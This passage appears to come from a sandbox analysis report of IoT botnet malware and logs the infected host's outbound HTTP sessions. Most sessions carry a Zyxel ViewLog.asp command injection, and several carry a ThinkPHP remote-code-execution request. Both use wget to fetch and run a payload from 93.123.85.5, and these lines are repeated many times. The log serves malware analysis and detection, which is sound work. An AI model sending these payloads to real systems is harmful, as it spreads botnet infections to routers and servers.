3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              700192.168.2.234212694.45.55.1738080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:51.086380959 CET13773OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:51.414328098 CET13783INHTTP/1.1 405 HTTP method POST is not supported by this URL
                                                              Date: Mon, 13 Nov 2023 21:19:52 GMT
                                                              Cache-Control: must-revalidate,no-cache,no-store
                                                              Content-Type: text/html; charset=ISO-8859-1
                                                              Content-Length: 333
                                                              Server: Jetty(9.2.10.v20150310)
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 3a 20 34 30 35 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 48 54 54 50 20 6d 65 74 68 6f 64 20 50 4f 53 54 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 62 79 20 74 68 69 73 20 55 52 4c 3c 2f 70 72 65 3e 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 3c 69 3e 3c 73 6d 61 6c 6c 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 3c 2f 73 6d 61 6c 6c 3e 3c 2f 69 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 405 </title></head><body><h2>HTTP ERROR: 405</h2><p>Problem accessing /cgi-bin/ViewLog.asp. Reason:<pre> HTTP method POST is not supported by this URL</pre></p><hr /><i><small>Powered by Jetty://</small></i></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              701192.168.2.233568062.29.85.758080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:51.104465008 CET13775OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              702192.168.2.233592231.200.4.698080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:51.104481936 CET13775OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              703192.168.2.235821695.217.151.438080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:51.376030922 CET13781OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              704192.168.2.234084431.136.136.2408080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:51.414848089 CET13783OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:52.422753096 CET13906OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:54.406506062 CET14149OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:58.533935070 CET14642OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:06.468976021 CET15684OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:22.338988066 CET17677OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:54.334703922 CET20684OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              705192.168.2.234413495.86.64.228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:51.720241070 CET13871OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              706192.168.2.234277895.100.203.680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.241360903 CET13900OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:52.535604000 CET13910INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 256
                                                              Expires: Mon, 13 Nov 2023 21:19:52 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:52 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 63 62 36 34 35 66 26 23 34 36 3b 31 36 39 39 39 31 30 33 39 32 26 23 34 36 3b 34 33 33 38 62 38 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6cb645f&#46;1699910392&#46;4338b8f</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              707192.168.2.233918895.107.248.5180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.277359009 CET13901OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:52.608712912 CET13911INHTTP/1.1 400 Bad Request
                                                              Connection: Keep-Alive
                                                              Nov 13, 2023 22:19:52.609260082 CET13912INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              708192.168.2.234622695.124.31.21480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.358985901 CET13902OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:52.745570898 CET14003INHTTP/1.0 406 Not Acceptable
                                                              Server: GoAhead-http
                                                              Access-Control-Allow-Origin: *
                                                              Date: 2023-11-13 21:19:51
                                                              Content-Length: 197
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 3e 55 6e 73 75 70 70 6f 72 74 65 64 20 48 54 54 50 20 70 72 6f 74 6f 63 6f 6c 3c 2f 70 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                              Data Ascii: <html> <head><title>Document Error: Not Acceptable</title></head> <body> <h2>Access Error: Not Acceptable</h2> <p>Unsupported HTTP protocol</p> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              709192.168.2.234890885.143.113.408080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.405572891 CET13903OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:52.733297110 CET13932INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:19:52 GMT
                                                              Server: Apache/2.2.22 (Debian)
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Content-Length: 246
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8f d1 4b c3 30 10 c6 df fb 57 9c 7b d2 87 e5 da 52 64 42 08 e8 da e1 a0 ce a2 dd 60 8f e9 72 2e 81 d9 d4 24 73 f8 df 9b 76 08 72 70 f0 dd 7d bf e3 3b 7e 53 be 2e db 7d 53 c1 73 fb 52 43 b3 7d aa d7 4b 98 cd 11 d7 55 bb 42 2c db f2 ba c9 59 8a 58 6d 66 22 e1 3a 7c 9e 04 d7 24 55 14 c1 84 13 89 22 2d 60 63 03 ac ec b9 57 1c af c3 84 e3 64 e2 9d 55 3f 23 97 89 7f 9e a8 12 3e 88 56 13 38 fa 3a 93 0f a4 60 fb 56 03 1e 8e 66 de 99 1e 77 86 2e b5 3d 32 e9 07 b8 48 0f 7d 84 3f 46 18 6c 0f 41 1b 0f 9e dc 37 39 c6 71 18 cf bb d8 a4 52 8e bc 17 8f 83 3c 68 c2 9c c5 ca e1 b6 a4 ce c8 fe 0e de 27 00 64 80 ec 21 67 d9 fd 82 a5 2c 2b a0 b1 2e c0 22 e5 f8 87 c7 e8 53 e8 18 73 7c 36 f9 05 62 75 4b 42 27 01 00 00
                                                              Data Ascii: MK0W{RdB`r.$svrp};~S.}SsRC}KUB,YXmf":|$U"-`cWdU?#>V8:`Vfw.=2H}?FlA79qR<h'd!g,+."Ss|6buKB'


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              71192.168.2.235533894.120.154.1498080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.077994108 CET2578OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              710192.168.2.235907431.136.193.958080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:52.405680895 CET13904OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:53.414665937 CET14032OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:55.398358107 CET14270OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:59.557883024 CET14772OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:07.492924929 CET15802OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
